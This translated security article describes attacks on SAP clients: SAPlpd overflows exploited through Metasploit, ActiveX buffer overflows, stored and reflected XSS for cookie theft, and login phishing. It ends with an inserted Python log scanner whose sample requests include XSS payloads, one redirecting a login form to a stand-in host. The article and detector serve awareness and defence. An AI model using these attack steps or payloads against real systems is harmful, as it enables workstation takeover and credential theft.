Information security is a complex process, and one of its most important tasks is securing business application software. Today SAP is the most widely used platform for managing enterprise systems and for storing an organisation's most critical data. Unfortunately, attention to SAP security is still insufficient. In this article we describe in detail, with examples, a number of attack methods against SAP clients, in the hope of drawing enough attention from security staff.
I. Introduction
Information security is a complex process, and one of its most important tasks is securing business application software. Today SAP is the most widely used platform for managing enterprise systems and for storing an organisation's most critical data. Unfortunately, attention to SAP security is still insufficient. In fact, problems remain at every level of an SAP system: the network level, the business system level, the database level, the application level and the SAP client level. Literature on SAP server security is fairly widespread, but material on SAP client security is comparatively rare. Yet even if the SAP server environment is secure, flaws on the SAP client side mean that, by Cooper's principle, the security of the entire system is in jeopardy.
In this article we discuss SAP client security issues. SAP clients can be attacked not only from within the corporate network but also from the public network, and the user workstations under attack are precisely those with access to the SAP servers and to business-critical enterprise data.
II. Exploiting overflows on the SAP client
SAPGUI is the standard application used to connect to SAP and work with its data. In large companies that use SAP, almost every SAP client workstation has this application installed.
Like other applications with a complex structure, this one has many vulnerabilities. Given how widespread it is, a vulnerability found in SAPGUI is comparable in severity to an overflow in the IE browser or in Microsoft Office. Windows Update makes patching the basic infrastructure quite easy, and administrators are notified of serious Windows flaws, but the situation is different for the SAP client. It has two main security problems: first, the client software has no automatic update mechanism; second, information about known problems and their fixes is still relatively scarce.
Since SAP systems are also accessed through a browser, vulnerabilities in SAP web servers can expose SAP clients to various XSS attacks, which further increases the possibility of attacks on the client side.
In this article we look more closely at the various vulnerabilities in the SAP GUI client application and the SAP web server, and at the buffer overflow in the SAPlpd component of SAP GUI.
Early last year, security researchers found several buffer overflow vulnerabilities in the SAPlpd and SAPsprint components. SAPlpd is installed on every user workstation as part of the SAP GUI client application; it runs on port 515 and provides printing services. Several flaws were found in the protocol used by SAPlpd; they allow an attacker to take remote control of a vulnerable system, carry out a denial-of-service attack or stop the print service. Details of these vulnerabilities can be found in SAP's official report. The main peculiarity of this weakness is that the service port is closed by default and opens only while a user is printing a document. At first glance this makes attacking the user's workstation harder; in practice it does not.
In a company using SAP, the number of SAP users is typically in the hundreds or even thousands, so at any given moment it is very likely that someone is printing a document. An attacker can therefore write a script that scans the network for the open port and, as soon as one is detected, launches exploit code against the weakness to obtain administrative access to the user's workstation.
This is not merely a theoretical idea; doing it is simple. Exploit code for the vulnerability has been added to the Metasploit framework, which is freely downloadable from the Internet. All the attacker has to do is choose a shellcode to use against the client, then add the IP addresses of the client workstations to the db_autopwn module. If the SAPlpd version is vulnerable and the user has started a print job at that moment, the attacker gains access to the user's workstation (see Figure 1). In fact, 67% of SAPGUI installations are vulnerable to this attack.
Figure 1: Gaining access to an SAP client through the SAPlpd vulnerability
With command-prompt access to the user's workstation, the attacker can do far worse: for example, install a Trojan horse to steal passwords, or read the user's credentials from the sapshortcut.ini configuration file, which gives direct access to SAP servers and critical business data.
III. Vulnerabilities in SAP GUI ActiveX components
In fact, the SAP GUI application contains many buffer overflow vulnerabilities. Below we discuss some of the vulnerabilities in its ActiveX components. SAP GUI consists of about 1000 different ActiveX components, each of which may be vulnerable.
Exploiting such vulnerabilities usually requires human intervention: the user must click a link supplied by the attacker (delivered by e-mail, instant messaging and so on), causing the browser to use the vulnerable component, so that the victim's command prompt falls into the attacker's hands. Data show that in general 10% to 50% of users will click on a malicious link sent to them through social engineering. The overflow causes code to execute in the context of the victim's browser component; if the victim habitually runs the browser with administrator privileges, the attacker obtains those privileges.
The first public vulnerability in an SAP GUI ActiveX component was disclosed in 2007. At the same time a security vulnerability was discovered in the kwedit component, and another was found in the rfcguisink component. After successfully exploiting these vulnerabilities an attacker gains remote control of the client system. They have since been patched, and the details can be found in SAP's notice. Remote overflow vulnerabilities were subsequently found in other components as well, and some of them have not yet been fixed.
In June 2009 another buffer overflow vulnerability was discovered, in sapirrfc.dll. Like the others, it can be used to gain remote control of the victim's workstation.
To exploit it, an attacker designs an HTML page that loads the vulnerable SAPIrRfc ActiveX component and then passes it a parameter longer than 720 bytes in order to take it over.
Once the user clicks the link, the result is a denial of service on the user's workstation or remote code execution on it. Below is proof-of-concept code that causes a denial of service:
Figure 2: Sample code
Overall, the following factors increase the risk of attack:
1. Many vulnerabilities have been found in rfcguisink, kwedit and WebViewer3D; exploit code is readily available and much of it has been included in Metasploit. All the attacker needs to do is choose a shellcode, find users' e-mail addresses and send an e-mail containing a link to a site that exploits the vulnerable component. This makes it possible to obtain shells on a large number of corporate workstations.
2. The vulnerability found in sapirrfc.dll was fixed in SAP GUI 7.10. For versions 6.2 and 6.4, however, no patch is available, and upgrading to 7.1 is recommended. Since versions 6.2 and 6.4 currently account for 10% and 50% of user workstations respectively (version 7.1 accounts for the remaining 40%), most corporate users still live under the threat of these attacks.
3. Besides e-mail or instant messaging, an alternative approach is for the attacker to create a malicious HTML document in an enterprise document-flow system such as SAP CFolders. People trust a document there far more than one received by e-mail or instant messaging, although uploading a document into an internal system is comparatively harder.
IV. Exploiting SAP clients through the SAP Web Application Server
More and more SAP systems are now delivered over the web: SAP Enterprise Portal, SAP SRM, SAP CRM and many other components. Some of these let users work with the various functions of SAP systems from a browser, so that SAP applications look no different from popular web applications. Underneath, however, the SAP NetWeaver platform is simply built on its own web application server. Even in its default configuration, without additional components, SAP NetWeaver contains a number of vulnerabilities.
Although these vulnerabilities are found on the web server, the target of the attack is the SAP client. Any discussion of SAP client security must therefore mention the typical client-side web application vulnerabilities. On the SAP client, the vulnerabilities we are concerned with are:
◆ HTML code injection, or stored XSS;
◆ reflected XSS;
◆ phishing attacks that intercept authentication data.
HTML code injection and stored XSS
Let us look at an example of an HTML injection vulnerability (also known as stored XSS) in the SAP SRM application (the application used by remote suppliers).
SAP SRM allows users to create HTML documents containing arbitrary data and to place them in a general folder on the purchasing side. An authenticated user of the system (on the supplier side) can therefore launch a stored XSS attack. Suppose malicious code is injected into the entry page; a buyer can normally access the document exchange folder. If the buyer views this page, his session credential (cookie) is intercepted and forwarded to the attacker's site. The following HTML file is an example:
Figure 3: Sample HTML file
Since an SAP SRM user session is not bound to an IP address, the attacker can use the stolen cookie to connect in the user's context, gaining that user's permissions and privileges in the document management functions for other suppliers. This is not the only vulnerability of its kind; details of a similar one can be found in the official notification, which describes how arbitrary HTML pages and JavaScript could be entered in order to gain access to other users' sessions.
Recall the SAPGUI ActiveX vulnerabilities described earlier: combined with the vulnerability here, they give a new form of attack, in which the loaded HTML page requests the vulnerable ActiveX component. In that case, if a company employee opens our document, we gain access to his workstation, which lays the foundation for further attacks on the enterprise network.
Reflected XSS
As mentioned earlier, even the standard SAP NetWeaver applications have a number of security vulnerabilities, to say nothing of the other components. According to security researchers, about 20 security vulnerabilities in SAP applications have been published. That is only what is public; we do not know about those that have not yet been disclosed.
Having described the security hole in SAP SRM, we now examine a number of vulnerabilities in another application, SAP IGS. To exploit them, an attacker must create a link of the following form:
Figure 4: Sample link
The attacker then sends it to the victim and obtains his cookie. There are many such vulnerabilities in the standard SAP environment and its other components; we will not introduce them one by one here.
Using XSS to fish for authentication data
XSS vulnerabilities can also be used in phishing attacks that capture a user's authentication data. An XSS vulnerability of this kind was found in the SAP Web Application Server, on which SAP systems are based. The cause is that the URL of the standard web logon interface, /sap/bc/gui/sap/its/webgui/, is not strictly filtered.
Figure 5: Logging in to SAP through the standard web interface
This XSS vulnerability allows JavaScript to be injected through the URL, and the injected code can be placed in the page source after the form into which the user enters the username and password. The injected code modifies the standard input fields so that, when the user presses the submit button, the entered data are sent to a site under the attacker's control. Here is a fragment of the original page code:
Figure 6: Fragment of the original page code
As can be seen, we can rewrite the code of the input form. To carry out this attack, the attacker must send potential victims a link of the following form:
Figure 7: Sample link
When the user clicks this link and enters authentication data, the data fall into the attacker's hands.
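Both reflected XSS variants described above (the SAP IGS links and the unfiltered webgui logon URL) leave the injected markup in the web server's access log. The following added example, which is not part of the original article, shows detection logic that flags such requests under the ICF path prefix; the log lines, the signature list, the decoding depth and the combined log format are constructed assumptions rather than any specific SAP trace layout.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format), not taken from the article.
# Line 2 carries a script tag in the webgui path; line 4 carries a double-encoded event handler.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2010:09:14:02 +0000] "GET /sap/bc/gui/sap/its/webgui/ HTTP/1.1" 200 5120
10.0.0.7 - - [12/Mar/2010:09:14:09 +0000] "GET /sap/bc/gui/sap/its/webgui/%3Cscript%3Edocument.forms%5B0%5D.action%3D%22http%3A%2F%2Fexample.invalid%2F%22%3C%2Fscript%3E HTTP/1.1" 200 5300
10.0.0.9 - - [12/Mar/2010:09:15:30 +0000] "GET /sap/bc/gui/sap/its/webgui/?~transaction=SU01 HTTP/1.1" 200 4800
10.0.0.12 - - [12/Mar/2010:09:16:41 +0000] "GET /sap/bc/gui/sap/its/webgui/%2522%2520onload%253Dalert(1) HTTP/1.1" 200 5100
"""

# client_ip, method and request path from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

# Markup that has no business in an ICF path or query; matched after decoding, case-insensitive.
XSS_PATTERNS = [
    ("script tag", re.compile(r"<\s*/?\s*script", re.I)),
    ("event handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript uri", re.compile(r"javascript\s*:", re.I)),
    ("embedded element", re.compile(r"<\s*(iframe|img|svg|object|embed)\b", re.I)),
]

def decode_path(path, rounds=2):
    """Percent-decode repeatedly so double-encoded payloads (%2522 -> %22 -> ") are normalised."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify_path(path):
    """Return the name of the first XSS signature found in the decoded path, or None if clean."""
    decoded = decode_path(path)
    for name, pattern in XSS_PATTERNS:
        if pattern.search(decoded):
            return name
    return None

def scan_log(text, prefix="/sap/bc/"):
    """Return (client_ip, decoded_path, finding) for every request under `prefix` that looks like XSS."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _method, path = m.groups()
        if path.startswith(prefix):
            finding = classify_path(path)
            if finding:
                hits.append((ip, decode_path(path), finding))
    return hits

if __name__ == "__main__":
    for ip, path, finding in scan_log(SAMPLE_LOG):
        print(f"{ip}: {finding} in {path}")
```

Legitimate webgui parameters such as ~transaction pass unflagged, while the decoded payloads of lines 2 and 4 are reported with their source addresses.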
V. Summary
In this paper we have described in detail, with examples, a number of attack methods against SAP clients. Exploit code for these vulnerabilities can be found on the network, which raises their risk factor. We know that web clients suffer from a large number of security vulnerabilities, and that almost every SAP web application has client-side security vulnerabilities. We therefore hope that the staff responsible for these systems will take their security seriously enough.